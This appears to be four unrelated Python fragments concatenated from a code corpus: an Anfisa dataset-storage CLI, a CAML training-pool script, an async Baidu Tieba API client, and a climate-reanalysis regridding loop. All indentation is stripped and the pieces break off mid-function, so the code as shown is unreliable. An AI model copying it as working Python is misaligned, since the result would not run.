os.rename(batch_dir + "/~loaded.txt", batch_dir + "/loaded.txt")
with open(batch_dir + "/log", "at") as outp:
print("%s: Done portion %d" % (str(datetime.now()), next_portion),
file = outp)
return True
#===============================================
def favorBatch(app_config, druid_adm, batch_dir, report_lines):
while _favorBatch(app_config, druid_adm, batch_dir, report_lines):
pass
#===============================================
if __name__ == '__main__':
try:
sys.stderr = codecs.getwriter('utf8')(sys.stderr.detach())
sys.stdout = codecs.getwriter('utf8')(sys.stdout.detach())
except Exception:
pass
logging.root.setLevel(logging.INFO)
#========================================
import forome_tools
forome_tools.compatible((0, 1, 7))
#========================================
if sys.version_info < (3, 7):
from backports.datetime_fromisoformat import MonkeyPatch
MonkeyPatch.patch_fromisoformat()
#========================================
parser = ArgumentParser()
parser.add_argument("-d", "--dir",
help = "Storage directory control file")
parser.add_argument("-c", "--config",
help = "Anfisa configuration file, used only if --dir is unset, "
"default = anfisa.json")
parser.add_argument("-m", "--mode",
help = "Mode: create/drop/druid-push/doc-push/register/favor")
parser.add_argument("-k", "--kind", default = "ws",
help = "Kind of dataset: ws/xl, default = ws, "
"actual if --dir is unset")
parser.add_argument("-s", "--source", help="Annotated json, "
"actual if --dir is unset and mode = create")
parser.add_argument("-i", "--inv", help="Annotation inventory")
parser.add_argument("-f", "--force", action = "store_true",
help = "Force removal, actual if mode = create")
parser.add_argument("-C", "--nocoord", action = "store_true",
help = "Druid: no use coordinator")
parser.add_argument("--reportlines", type = int, default = 100,
help = "Portion for report lines, default = 100")
parser.add_argument("--delay", type = int, default = 0,
help = "Delay between work with multiple datasets, in seconds")
parser.add_argument("--nodruidpush", action = "store_true",
help = "No push into Druid, if mode = create")
parser.add_argument("names", nargs = "+", help = "Dataset name(s)")
args = parser.parse_args()
if args.mode == "register":
if (not args.dir or (not args.source and not args.inv)
or (args.source and args.inv)):
print("Improper arguments: mode register requires "
"--dir and (--source or --inv)")
sys.exit()
if len(args.names) != 1:
print("Only one dataset can be registered")
sys.exit(1)
dir_config = loadCommentedJSon(args.dir)
new_descr = {"kind": args.kind}
if args.source:
new_descr["a-json"] = args.source
else:
new_descr["inv"] = args.inv
dir_config["datasets"][args.names[0]] = new_descr
tmp_name = '~' + args.dir + '.tmp'
with open(tmp_name, "w", encoding = "utf-8") as outp:
outp.write(json.dumps(dir_config,
indent = 4, sort_keys = True, ensure_ascii = False))
os.rename(args.dir, args.dir + '~')
os.rename(tmp_name, args.dir)
print("Directory file", args.dir, "updated")
sys.exit()
if args.mode == "favor":
app_config = loadJSonConfig(args.config,
home_base_file = __file__, home_base_level = 1)
druid_adm = DruidAdmin(app_config, | |
<reponame>NoldAndreas/FINDER<filename>Code/CAML/2.0_Pool_Trn_and_Val_Sets.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
'''
Accept files created by 1.0_Data_Preparation and pools points into a set
for training and validating new models.
@author: dave
'''
import os
import pandas as pd
from natsort import natsorted
import numpy as np
import pickle
from random import shuffle
import gc
import time
import json
proc_wd = os.path.dirname(os.path.abspath(__file__))
if os.getcwd() != proc_wd:
os.chdir(proc_wd)
print('Changed working directory to ' + proc_wd)
import FuncEtc as fn_etc
# ========================================================================
# About the training data
# ========================================================================
total_features = 1 # how many input features are we tracking,
# e.g. 1=distances, 2 = x,y coords, 3 = x,y,z coords,
total_labels = 2 # how many classification labels can we apply?
# e.g. 2=clustered/notclustered
# a default list for two labels:
default_label_names = ['Non-clustered', 'Clustered']
## a default list for three labels:
#default_label_names = ['Non-clustered', 'Clustered (round)', 'Clustered (fibre)']
feature_type = 'dists' # Either 'dists' or 'coords' to train on the distance values
# or the xy(z) coordinates.
# if 'coords' then you want to check that total_features is
# 2 or 3 for 2D or 3D images.
# ========================================================================
# Harvesting points from images
# ========================================================================
# from each input image, how many points of each class will be added to the pool?
points_per_label = 2000 # This many points (of each label) will be taken per image.
# If this many points (of a label) are not available then
# as many as are available will be taken.
# If no points (of a label) are available then no points
# will be taken to the pool, for that image.
#
# ... OR ...
#
use_all_points = True # if this is True then all points (of all labels) will
# be taken from each image. Useful if you have limited
# amount of training data or your labels are not evenly
# found within your source images.
# ========================================================================
# Total size of points-pools
# ========================================================================
# Overall number of points to use for training, validation, and testing datasets
total_training_count = 500000 # default 500000
total_validation_count = 100000 # default 100000
total_testing_count = 100000 # default 100000
# ========================================================================
# Composition of each pool
# ========================================================================
# Each pool of points will have a mixture of the available labels.
even_label_ratios = True # If True each label will be equally represented.
# If False then you must specify your own
# custom mixture of labels, below.
# Customised mixture of the labels within the training datasets.
# These three lines will be *ignored* if you are using even_label_ratios=True
# - Ensure there is an entry for each label!
# - Ensure the sum of all entries = 1.0!
# Two labels - custom mix of labels (if not using even_label_ratios, above)
training_label_fraction = [0.65, 0.35]
validation_label_fraction = [0.45, 0.55]
testing_label_fraction = [0.1, 0.9]
## Three labels - custom mix of labels (if not using even_label_ratios, above)
#training_label_fraction = [0.5, 0.35, 0.15]
#validation_label_fraction = [0.25, 0.5, 0.25]
#testing_label_fraction = [0.1, 0.1, 0.8]
# ========================================================================
# End of user-editable variables
# ========================================================================
if __name__ == '__main__':
# assuming you just ran the first stage, we can recycle the output folder from
# that stage as the input for this stage.
default_preplog = ''
default_input_path = os.getcwd()
if 's1_prep_outputpath' in locals():
# output exists from previous 1_DataPreparation script
default_input_path = s1_prep_outputpath
inputpath_train = fn_etc.askforinput(
message = 'Folder with distance measurements from ' +
'Stage 1 (.MemMap and .json etc)',
errormessage = 'The folder you provided does not exist',
defaultval = default_input_path,
isvalid = lambda v : os.path.isdir(v))
if os.path.exists(os.path.join(inputpath_train, 'PrepLog.txt')):
default_preplog = os.path.join(inputpath_train, 'PrepLog.txt')
print('') #blank line
fn_etc.info_msg('Found PrepLog.txt in the input folder')
PrepLogMessage = 'Confirm the path to PrepLog.txt file'
else:
PrepLogMessage = 'Enter the path to PrepLog.txt file'
input_PrepLog = fn_etc.askforinput(
message = PrepLogMessage,
errormessage = 'The file you provided does not exist',
defaultval = default_preplog,
isvalid = lambda v : os.path.isfile(v))
del PrepLogMessage
if os.path.isfile(input_PrepLog):
PrepLog_imported = pd.read_csv(input_PrepLog, delimiter='\t')
fn_etc.info_msg('Loaded PrepLog file from:')
fn_etc.info_msg(input_PrepLog)
# Clean any stray header lines that might have come in after restarting some processing
if PrepLog_imported.FileID.dtype != 'int64':
PrepLog_imported = PrepLog_imported[~PrepLog_imported.FileID.str.contains('FileID')]
PrepLog_imported = PrepLog_imported.apply(pd.to_numeric) #convert to numeric (rather than object)
PrepLog_imported = PrepLog_imported.reset_index(drop=True) # re-index to ignore the missing row(s)
else:
fn_etc.err_msg('Cannot find PrepLog.txt in the specified location')
raise ValueError('Cannot find PrepLog.txt! ' +
'has it moved since you gave its location?')
s2_trnvaltest_outputpath = fn_etc.askforinput(
message = 'Location of the output folder (will be created if it doesn\'t exist)',
errormessage= 'The dataset must be named',
defaultval= os.path.abspath(os.path.join(inputpath_train, '..', '2_training_pool')),
isvalid = lambda v : len(v) > 0 and not v.isspace())
# Confirm the human-readable labels to use in plots and messages.
label_names = [] # will hold the human-readable names for all our labels
label_counters = [] # will hold the counts for each label
for label in range(total_labels):
try:
suggested_label_name = default_label_names[label]
except:
suggested_label_name = 'Type ' + str(label)
label_name = fn_etc.askforinput(
message = 'Human-readable name for points with Label ' + str(label) + '',
errormessage = 'The label must have a name! The name must also have at least one readable character in it.',
defaultval = suggested_label_name,
isvalid = lambda v : len(v) > 0 and not v.isspace())
label_names.append(str(label_name))
label_counters.append(0)
## Either calculate the label ratios or check that the custom ratios are good.
if even_label_ratios:
label_split = 1/total_labels
training_label_fraction = []
validation_label_fraction = []
testing_label_fraction = []
for label in range(total_labels):
training_label_fraction.append(label_split)
validation_label_fraction.append(label_split)
testing_label_fraction.append(label_split)
else:
# customized split of the labels detected!
# Check that enough custom-splits have been supplied
if len(training_label_fraction) != total_labels:
raise ValueError('You have given ' + str(total_labels) + ' labels but only supplied ' + str(len(training_label_fraction)) + ' entries for training_label_fraction!')
if len(validation_label_fraction) != total_labels:
raise ValueError('You have given ' + str(total_labels) + ' labels but only supplied ' + str(len(validation_label_fraction)) + ' entries for training_label_fraction!')
if len(testing_label_fraction) != total_labels:
raise ValueError('You have given ' + str(total_labels) + ' labels but only supplied ' + str(len(testing_label_fraction)) + ' entries for training_label_fraction!')
# Check that each arrangment adds up to 1
if sum(training_label_fraction) != 1:
raise ValueError('The values for \'training_label_fraction\' must sum up to 1.0')
if sum(validation_label_fraction) != 1:
raise ValueError('The values for \'validation_label_fraction\' must sum up to 1.0')
if sum(testing_label_fraction) != 1:
raise ValueError('The values for \'testing_label_fraction\' must sum up to 1.0')
## get a list of the files to process from the given folder
# mmap array for the distances to the Nth NNs.
dist_files_train = natsorted([i for i in os.listdir(inputpath_train) if os.path.isfile(os.path.join(inputpath_train, i)) and 'Dists.MemMap' in i])
# mmap array for the original xy input data
data_files_train = natsorted([i for i in os.listdir(inputpath_train) if os.path.isfile(os.path.join(inputpath_train, i)) and 'Data.MemMap' in i])
# mmap array for the 'target_vectors' classifier for training data
target_vectors_files_train = natsorted([i for i in os.listdir(inputpath_train) if os.path.isfile(os.path.join(inputpath_train, i)) and 'TargetVectors.MemMap' in i])
# mmap array for the 'target_binary' classifier for training data
target_binary_files_train = natsorted([i for i in os.listdir(inputpath_train) if os.path.isfile(os.path.join(inputpath_train, i)) and 'TargetBinary.MemMap' in i])
# mmap array for the 'target_labels' classifier for training data
target_labels_files_train = natsorted([i for i in os.listdir(inputpath_train) if os.path.isfile(os.path.join(inputpath_train, i)) and 'TargetLabels.MemMap' in i])
# json file describing the metadata for each input file (image size, NN etc)
json_files_train = natsorted([i for i in os.listdir(inputpath_train) if os.path.isfile(os.path.join(inputpath_train, i)) and '.json' in i])
total_files_train = np.shape(dist_files_train)[0]
if total_files_train > 0:
if total_files_train != np.shape(PrepLog_imported)[0]:
ErrorMessage = 'Input folder contains ' + str(total_files_train) + ' files but your PrepLog describes ' + str(np.shape(PrepLog_imported)[0]) + ' files!'
fn_etc.err_msg('Files in the input folder don\'t align with those in the PrepLog.txt file.')
raise ValueError(ErrorMessage)
else:
if total_files_train == np.shape(data_files_train)[0] == np.shape(json_files_train)[0] == np.shape(target_vectors_files_train)[0] == np.shape(target_binary_files_train)[0]:
fn_etc.info_msg('Found ' + str(total_files_train) + ' datasets to work with...')
else:
if np.shape(target_labels_files_train)[0] == np.shape(target_vectors_files_train)[0] == np.shape(target_binary_files_train)[0] == 0:
ErrorMessage = 'There appears to be no useable files for model training. Cannot find TargetLabels.MemMap files!'
fn_etc.err_msg('Missing required files for training!')
else:
ErrorMessage = 'For training and validation, each dataset requires a corresponding set of four | |
payload = [
('BDUSS', self.sessions.BDUSS),
('portrait', user.portrait),
('tbs', await self.get_tbs()),
]
try:
res = await self.sessions.app.post(
"http://c.tieba.baidu.com/c/c/user/unfollow", data=self.sessions._pack_form(payload)
)
res_json: dict = await res.json(encoding='utf-8', loads=JSON_DECODER.decode, content_type=None)
if int(res_json['error_code']):
raise ValueError(res_json['error_msg'])
except Exception as err:
LOG.warning(f"Failed to unfollow user {user.log_name}. reason:{err}")
return False
LOG.info(f"Successfully unfollowed user {user.log_name}")
return True
async def get_self_forum_list(self, pn: int = 1) -> Tuple[List[Tuple[str, int]], bool]:
"""
获取第pn页的本人关注贴吧列表
Args:
pn (int, optional): 页码. Defaults to 1.
Returns:
tuple[list[tuple[str, int]], bool]: list[贴吧名, 贴吧id], 是否还有下一页
"""
try:
res = await self.sessions.web.get("https://tieba.baidu.com/mg/o/getForumHome", params={'pn': pn, 'rn': 200})
res_json: dict = await res.json(encoding='utf-8', content_type=None)
if int(res_json['errno']):
raise ValueError(res_json['errmsg'])
forums: list[dict] = res_json['data']['like_forum']['list']
res_list = [(forum['forum_name'], int(forum['forum_id'])) for forum in forums]
has_more = len(forums) == 200
except Exception as err:
LOG.warning(f"Failed to get self_forum_list. reason:{err}")
res_list = []
has_more = False
return res_list, has_more
async def like_forum(self, fname_or_fid: Union[str, int]) -> bool:
"""
关注贴吧
Args:
fname_or_fid (str | int): 要关注贴吧的贴吧名或fid 优先fid
Returns:
bool: 操作是否成功
"""
fid = fname_or_fid if isinstance(fname_or_fid, int) else await self.get_fid(fname_or_fid)
try:
payload = [
('BDUSS', self.sessions.BDUSS),
('fid', fid),
('tbs', await self.get_tbs()),
]
res = await self.sessions.app.post(
"http://c.tieba.baidu.com/c/c/forum/like", data=self.sessions._pack_form(payload)
)
res_json: dict = await res.json(encoding='utf-8', content_type=None)
if int(res_json['error_code']):
raise ValueError(res_json['error_msg'])
if int(res_json['error']['errno']):
raise ValueError(res_json['error']['errmsg'])
except Exception as err:
LOG.warning(f"Failed to like forum {fname_or_fid}. reason:{err}")
return False
LOG.info(f"Successfully liked forum {fname_or_fid}")
return True
async def unlike_forum(self, fname_or_fid: Union[str, int]) -> bool:
"""
取关贴吧
Args:
fname_or_fid (str | int): 要取关贴吧的贴吧名或fid 优先fid
Returns:
bool: 操作是否成功
"""
fid = fname_or_fid if isinstance(fname_or_fid, int) else await self.get_fid(fname_or_fid)
try:
payload = [
('BDUSS', self.sessions.BDUSS),
('fid', fid),
('tbs', await self.get_tbs()),
]
res = await self.sessions.app.post(
"http://c.tieba.baidu.com/c/c/forum/unfavolike", data=self.sessions._pack_form(payload)
)
res_json: dict = await res.json(encoding='utf-8', content_type=None)
if int(res_json['error_code']):
raise ValueError(res_json['error_msg'])
except Exception as err:
LOG.warning(f"Failed to unlike forum {fname_or_fid}. reason:{err}")
return False
LOG.info(f"Successfully unliked forum {fname_or_fid}")
return True
async def sign_forum(self, fname_or_fid: Union[str, int]) -> bool:
"""
签到吧
Args:
fname_or_fid (str | int): 要签到贴吧的贴吧名或fid 优先贴吧名
Returns:
bool: True表示不需要再尝试签到 False表示由于各种原因失败需要重签
"""
fname = fname_or_fid if isinstance(fname_or_fid, str) else await self.get_fname(fname_or_fid)
try:
payload = [
('BDUSS', self.sessions.BDUSS),
('_client_version', self.sessions.latest_version),
('kw', fname),
('tbs', await self.get_tbs()),
]
res = await self.sessions.app.post(
"http://c.tieba.baidu.com/c/c/forum/sign", data=self.sessions._pack_form(payload)
)
res_json: dict = await res.json(encoding='utf-8', content_type=None)
error_code = int(res_json['error_code'])
if error_code:
raise ValueError(res_json['error_msg'])
if int(res_json['user_info']['sign_bonus_point']) == 0:
raise ValueError("sign_bonus_point is 0")
except Exception as err:
LOG.warning(f"Failed to sign forum {fname}. reason:{err}")
if error_code in [160002, 340006]:
# 已经签过或吧被屏蔽
return True
return False
LOG.info(f"Successfully signed forum {fname}")
return True
async def get_homepage(self, _id: Union[str, int]) -> Tuple[UserInfo, List[Thread]]:
"""
获取用户个人页信息
Args:
_id (str | int): 待获取用户的id user_id/user_name/portrait 优先portrait
Returns:
tuple[UserInfo, list[Thread]]: 用户信息, list[帖子信息]
"""
if not BasicUserInfo.is_portrait(_id):
user = await self.get_basic_user_info(_id)
else:
user = BasicUserInfo(_id)
payload = [
('_client_type', 2), # 删除该字段会导致post_list为空
('_client_version', self.sessions.latest_version), # 删除该字段会导致post_list和dynamic_list为空
('friend_uid_portrait', user.portrait),
('need_post_count', 1), # 删除该字段会导致无法获取发帖回帖数量
# ('uid', user_id), # 用该字段检查共同关注的吧
]
try:
res = await self.sessions.app.post(
"http://c.tieba.baidu.com/c/u/user/profile", data=self.sessions._pack_form(payload)
)
res_json: dict = await res.json(encoding='utf-8', loads=JSON_DECODER.decode, content_type=None)
if int(res_json['error_code']):
raise ValueError(res_json['error_msg'])
if not res_json.__contains__('user'):
raise ValueError("invalid params")
except Exception as err:
LOG.warning(f"Failed to get profile of {user.portrait}. reason:{err}")
return UserInfo(), []
user = UserInfo(_raw_data=ParseDict(res_json['user'], User_pb2.User(), ignore_unknown_fields=True))
def _pack_thread_dict(thread_dict: dict) -> NewThread:
thread = NewThread(ParseDict(thread_dict, NewThreadInfo_pb2.NewThreadInfo(), ignore_unknown_fields=True))
thread._user = user
return thread
threads = [_pack_thread_dict(thread_dict) for thread_dict in res_json['post_list']]
return user, threads
async def search_post(
self,
fname_or_fid: Union[str, int],
query: str,
pn: int = 1,
rn: int = 30,
query_type: int = 0,
only_thread: bool = False,
) -> Searches:
"""
贴吧搜索
Args:
fname_or_fid (str | int): 查询的贴吧名或fid 优先贴吧名
query (str): 查询文本
pn (int, optional): 页码. Defaults to 1.
rn (int, optional): 请求的条目数. Defaults to 30.
query_type (int, optional): 查询模式 0为全部搜索结果并且app似乎不提供这一模式 1为app时间倒序 2为app相关性排序. Defaults to 0.
only_thread (bool, optional): 是否仅查询主题帖. Defaults to False.
Returns:
Searches: 搜索结果列表
"""
fname = fname_or_fid if isinstance(fname_or_fid, str) else await self.get_fname(fname_or_fid)
payload = [
('_client_version', self.sessions.latest_version),
('kw', fname),
('only_thread', int(only_thread)),
('pn', pn),
('rn', rn),
('sm', query_type),
('word', query),
]
try:
res = await self.sessions.app.post(
"http://c.tieba.baidu.com/c/s/searchpost", data=self.sessions._pack_form(payload)
)
res_json: dict = await res.json(encoding='utf-8', loads=JSON_DECODER.decode, content_type=None)
if int(res_json['error_code']):
raise ValueError(res_json['error_msg'])
searches = Searches(res_json)
except Exception as err:
LOG.warning(f"Failed to search {query} in {fname}. reason:{err}")
searches = Searches()
return searches
async def get_forum_list(self, _id: Union[str, int]) -> List[Tuple[str, int, int, int]]:
"""
获取用户关注贴吧列表
Args:
_id (str | int): 待获取用户的id user_id/user_name/portrait 优先user_id
Returns:
list[tuple[str, int, int, int]]: list[贴吧名, 贴吧id, 等级, 经验值]
"""
if not BasicUserInfo.is_user_id(_id):
user = await self.get_basic_user_info(_id)
else:
user = BasicUserInfo(_id)
payload = [
('BDUSS', self.sessions.BDUSS),
('friend_uid', user.user_id),
]
try:
res = await self.sessions.app.post(
"http://c.tieba.baidu.com/c/f/forum/like", data=self.sessions._pack_form(payload)
)
res_json: dict = await res.json(encoding='utf-8', content_type=None)
if int(res_json['error_code']):
raise ValueError(res_json['error_msg'])
forums: list[dict] = res_json.get('forum_list', [])
res_list = [
(forum['name'], int(forum['id']), int(forum['level_id']), int(forum['cur_score'])) for forum in forums
]
except Exception as err:
LOG.warning(f"Failed to get forum_list of {user.user_id}. reason:{err}")
res_list = []
return res_list
async def get_forum_detail(self, fname_or_fid: Union[str, int]) -> Tuple[str, int, int]:
"""
通过forum_id获取贴吧信息
Args:
fname_or_fid (str | int): 目标贴吧名或fid 优先fid
Returns:
tuple[str, int, int]: 该贴吧的贴吧名, 关注人数, 主题帖数
"""
fid = fname_or_fid if isinstance(fname_or_fid, int) else await self.get_fid(fname_or_fid)
payload = [
('_client_version', self.sessions.latest_version),
('forum_id', fid),
]
try:
res = await self.sessions.app.post(
"http://c.tieba.baidu.com/c/f/forum/getforumdetail", data=self.sessions._pack_form(payload)
)
res_json: dict = await res.json(encoding='utf-8', content_type=None)
if int(res_json['error_code']):
raise ValueError(res_json['error_msg'])
fname = res_json['forum_info']['forum_name']
member_num = int(res_json['forum_info']['member_count'])
thread_num = int(res_json['forum_info']['thread_count'])
except Exception as err:
LOG.warning(f"Failed to get forum_detail of {fname_or_fid}. reason:{err}")
fname = ''
member_num = 0
thread_num = 0
return fname, member_num, thread_num
async def get_bawu_dict(self, fname_or_fid: Union[str, int]) -> Dict[str, List[BasicUserInfo]]:
"""
获取吧务信息
Args:
fname_or_fid (str | int): 目标贴吧名或fid 优先fid
Returns:
dict[str, list[BasicUserInfo]]: {吧务类型: list[吧务基本用户信息]}
"""
fid = fname_or_fid if isinstance(fname_or_fid, int) else await self.get_fid(fname_or_fid)
common_proto = CommonReq_pb2.CommonReq()
common_proto._client_version = self.sessions.latest_version
data_proto = GetBawuInfoReqIdl_pb2.GetBawuInfoReqIdl.DataReq()
data_proto.common.CopyFrom(common_proto)
data_proto.forum_id = fid
req_proto = GetBawuInfoReqIdl_pb2.GetBawuInfoReqIdl()
req_proto.data.CopyFrom(data_proto)
try:
res = await self.sessions.app_proto.post(
"http://c.tieba.baidu.com/c/f/forum/getBawuInfo?cmd=301007",
data=self.sessions._pack_proto_bytes(req_proto.SerializeToString()),
)
res_proto = GetBawuInfoResIdl_pb2.GetBawuInfoResIdl()
res_proto.ParseFromString(await res.content.read())
if int(res_proto.error.errorno):
raise ValueError(res_proto.error.errmsg)
roledes_protos = res_proto.data.bawu_team_info.bawu_team_list
bawu_dict = {
roledes_proto.role_name: [
BasicUserInfo(_raw_data=roleinfo_proto) for roleinfo_proto in roledes_proto.role_info
]
for roledes_proto in roledes_protos
}
except Exception as err:
LOG.warning(f"Failed to get bawu_dict. reason: {err}")
bawu_dict = {}
return bawu_dict
async def get_tab_map(self, fname_or_fid: Union[str, int]) -> Dict[str, int]:
"""
获取分区名到分区id的映射字典
Args:
fname_or_fid (str | int): 目标贴吧名或fid 优先贴吧名
Returns:
dict[str, int]: {分区名:分区id}
"""
fname = fname_or_fid if isinstance(fname_or_fid, str) else await self.get_fname(fname_or_fid)
common_proto = CommonReq_pb2.CommonReq()
common_proto.BDUSS = self.sessions.BDUSS
common_proto._client_version = self.sessions.latest_version
data_proto = SearchPostForumReqIdl_pb2.SearchPostForumReqIdl.DataReq()
data_proto.common.CopyFrom(common_proto)
data_proto.word = fname
req_proto = SearchPostForumReqIdl_pb2.SearchPostForumReqIdl()
req_proto.data.CopyFrom(data_proto)
try:
res = await self.sessions.app_proto.post(
"http://c.tieba.baidu.com/c/f/forum/searchPostForum?cmd=309466",
data=self.sessions._pack_proto_bytes(req_proto.SerializeToString()),
)
res_proto = SearchPostForumResIdl_pb2.SearchPostForumResIdl()
res_proto.ParseFromString(await res.content.read())
if int(res_proto.error.errorno):
raise ValueError(res_proto.error.errmsg)
tab_map = {tab_proto.tab_name: tab_proto.tab_id for tab_proto in res_proto.data.exact_match.tab_info}
except Exception as err:
LOG.warning(f"Failed to get tab_map of {fname}. reason:{err}")
tab_map = {}
return tab_map
async def get_recom_list(self, fname_or_fid: Union[str, int], pn: int = 1) -> Tuple[List[Tuple[Thread, int]], bool]:
"""
获取pn页的大吧主推荐帖列表
Args:
fname_or_fid (str | int): 目标贴吧名或fid 优先fid
pn (int, optional): 页码. Defaults to 1.
Returns:
tuple[list[tuple[Thread, int]], bool]: list[被推荐帖子信息,新增浏览量], 是否还有下一页
"""
fid = fname_or_fid if isinstance(fname_or_fid, int) else await self.get_fid(fname_or_fid)
payload = [
('BDUSS', self.sessions.BDUSS),
('_client_version', self.sessions.latest_version),
('forum_id', fid),
('pn', pn),
('rn', 30),
]
try:
res = await self.sessions.app.post(
"http://c.tieba.baidu.com/c/f/bawu/getRecomThreadHistory", data=self.sessions._pack_form(payload)
)
res_json: dict = await res.json(encoding='utf-8', loads=JSON_DECODER.decode, content_type=None)
if int(res_json['error_code']):
raise ValueError(res_json['error_msg'])
def _pack_data_dict(data_dict):
thread_dict = data_dict['thread_list']
thread = Thread(ParseDict(thread_dict, ThreadInfo_pb2.ThreadInfo(), ignore_unknown_fields=True))
add_view = thread.view_num - int(data_dict['current_pv'])
return thread, add_view
res_list = [_pack_data_dict(data_dict) for data_dict in res_json['recom_thread_list']]
has_more = bool(int(res_json['is_has_more']))
except Exception as err:
LOG.warning(f"Failed to get recom_list of {fname_or_fid}. reason:{err}")
res_list = []
has_more = False
return res_list, has_more
async def get_recom_status(self, fname_or_fid: Union[str, int]) -> Tuple[int, int]:
"""
获取大吧主推荐功能的月度配额状态
Args:
fname_or_fid (str | int): 目标贴吧名或fid 优先fid
Returns:
tuple[int, int]: 本月总推荐配额, 本月已使用的推荐配额
"""
fid = fname_or_fid if isinstance(fname_or_fid, int) else await self.get_fid(fname_or_fid)
payload = [
('BDUSS', self.sessions.BDUSS),
('_client_version', self.sessions.latest_version),
('forum_id', fid),
('pn', 1),
('rn', 0),
]
try:
res = await self.sessions.app.post(
"http://c.tieba.baidu.com/c/f/bawu/getRecomThreadList", data=self.sessions._pack_form(payload)
)
res_json: dict = await res.json(encoding='utf-8', content_type=None)
if int(res_json['error_code']):
raise ValueError(res_json['error_msg'])
total_recom_num = int(res_json['total_recommend_num'])
used_recom_num = int(res_json['used_recommend_num'])
except Exception as err:
LOG.warning(f"Failed to get recom_status of {fname_or_fid}. reason:{err}")
total_recom_num = 0
used_recom_num = 0
return total_recom_num, used_recom_num
async def get_statistics(self, fname_or_fid: Union[str, int]) -> Dict[str, List[int]]:
"""
获取吧务后台中最近29天的统计数据
Args:
fname_or_fid (str | | |
instance of the spherical harmonics object for the new grid
specob_new = Spharmt(nlon_new,nlat_new,gridtype='regular',legfunc='computed')
# loop over years of interest and transform...specify trange at top of file
iw = 0
if nya > 0:
iw = (nya-1)/2
cyears = list(range(trange[0],trange[1]))
lt_csave = np.zeros([len(cyears)])
le_csave = np.zeros([len(cyears)])
te_csave = np.zeros([len(cyears)])
lmr_allyears = np.zeros([len(cyears),nlat_new,nlon_new])
tcr_allyears = np.zeros([len(cyears),nlat_new,nlon_new])
era20c_allyears = np.zeros([len(cyears),nlat_new,nlon_new])
lmr_zm = np.zeros([len(cyears),nlat_new])
tcr_zm = np.zeros([len(cyears),nlat_new])
era20c_zm = np.zeros([len(cyears),nlat_new])
k = -1
for yr in cyears:
k = k + 1
LMR_smatch, LMR_ematch = find_date_indices(LMR_time,yr-iw,yr+iw+1)
TCR_smatch, TCR_ematch = find_date_indices(TCR_time,yr-iw,yr+iw+1)
ERA20C_smatch, ERA20C_ematch = find_date_indices(ERA20C_time,yr-iw,yr+iw+1)
print('------------------------------------------------------------------------')
print('working on year... %5s' % str(yr))
print(' %5s LMR index= %5s : LMR year= %5s' % (str(yr), str(LMR_smatch),str(LMR_time[LMR_smatch])))
# LMR
pdata_lmr = np.mean(LMR[LMR_smatch:LMR_ematch,:,:],0)
lmr_trunc = regrid(specob_lmr, specob_new, pdata_lmr, ntrunc=nlat_new-1, smooth=None)
# TCR
if TCR_smatch and TCR_ematch:
pdata_tcr = np.mean(TCR[TCR_smatch:TCR_ematch,:,:],0)
else:
pdata_tcr = np.zeros(shape=[nlat_TCR,nlon_TCR])
pdata_tcr.fill(np.nan)
# regrid on LMR grid
if np.isnan(pdata_tcr).all():
tcr_trunc = np.zeros(shape=[nlat_new,nlon_new])
tcr_trunc.fill(np.nan)
else:
tcr_trunc = regrid(specob_tcr, specob_new, pdata_tcr, ntrunc=nlat_new-1, smooth=None)
# ERA20C
if ERA20C_smatch and ERA20C_ematch:
pdata_era20c = np.mean(ERA20C[ERA20C_smatch:ERA20C_ematch,:,:],0)
else:
pdata_era20c = np.zeros(shape=[nlat_ERA20C,nlon_ERA20C])
pdata_era20c.fill(np.nan)
# regrid on LMR grid
if np.isnan(pdata_era20c).all():
era20c_trunc = np.zeros(shape=[nlat_new,nlon_new])
era20c_trunc.fill(np.nan)
else:
era20c_trunc = regrid(specob_era20c, specob_new, pdata_era20c, ntrunc=nlat_new-1, smooth=None)
if iplot_individual_years:
# Reanalysis comparison figures (annually-averaged anomaly fields)
#fmin = -60.0; fmax = +60.0; nflevs=41
fmin = verif_dict[var][3]; fmax = verif_dict[var][4]; nflevs=41
fig = plt.figure()
ax = fig.add_subplot(3,1,1)
LMR_plotter(lmr_trunc*verif_dict[var][6],lat2_new,lon2_new,'bwr',nflevs,vmin=fmin,vmax=fmax,extend='both')
plt.title('LMR '+'T'+str(nlat_new-ifix)+' '+verif_dict[var][1]+' anom. '+verif_dict[var][5]+' '+str(yr), fontweight='bold')
plt.clim(fmin,fmax)
ax = fig.add_subplot(3,1,2)
LMR_plotter(tcr_trunc*verif_dict[var][6],lat2_new,lon2_new,'bwr',nflevs,vmin=fmin,vmax=fmax,extend='both')
plt.title('20CR-V2 '+'T'+str(nlat_new-ifix)+' '+verif_dict[var][1]+' anom. '+verif_dict[var][5]+' '+str(yr), fontweight='bold')
#LMR_plotter(pdata_tcr*verif_dict[var][6],lat2_TCR,lon2_TCR,'bwr',nflevs,vmin=fmin,vmax=fmax,extend='both')
#plt.title('20CR-V2 '+'orig. grid'+' '+verif_dict[var][1]+' anom. '+verif_dict[var][5]+' '+str(yr), fontweight='bold')
plt.clim(fmin,fmax)
ax = fig.add_subplot(3,1,3)
LMR_plotter(era20c_trunc*verif_dict[var][6],lat2_new,lon2_new,'bwr',nflevs,vmin=fmin,vmax=fmax,extend='both')
plt.title('ERA-20C '+'T'+str(nlat_new-ifix)+' '+verif_dict[var][1]+' anom. '+verif_dict[var][5]+' '+str(yr), fontweight='bold')
#LMR_plotter(pdata_era20c*verif_dict[var][6],lat2_ERA20C,lon2_ERA20C,'bwr',nflevs,vmin=fmin,vmax=fmax,extend='both')
#plt.title('ERA-20C '+'orig. grid'+' '+verif_dict[var][1]+' anom. '+verif_dict[var][5]+' '+str(yr), fontweight='bold')
plt.clim(fmin,fmax)
fig.tight_layout()
plt.savefig(nexp+'_LMR_TCR_ERA20C_'+verif_dict[var][1]+'anom_'+str(yr)+'.png')
plt.close()
# save the full grids
lmr_allyears[k,:,:] = lmr_trunc
tcr_allyears[k,:,:] = tcr_trunc
era20c_allyears[k,:,:] = era20c_trunc
# -----------------------
# zonal-mean verification
# -----------------------
# LMR
lmr_zm[k,:] = np.mean(lmr_trunc,1)
# TCR
fracok = np.sum(np.isfinite(tcr_trunc),axis=1,dtype=np.float16)/float(nlon_TCR)
boolok = np.where(fracok >= valid_frac)
boolnotok = np.where(fracok < valid_frac)
for i in boolok:
tcr_zm[k,i] = np.nanmean(tcr_trunc[i,:],axis=1)
tcr_zm[k,boolnotok] = np.NAN
# ERA
fracok = np.sum(np.isfinite(era20c_trunc),axis=1,dtype=np.float16)/float(nlon_ERA20C)
boolok = np.where(fracok >= valid_frac)
boolnotok = np.where(fracok < valid_frac)
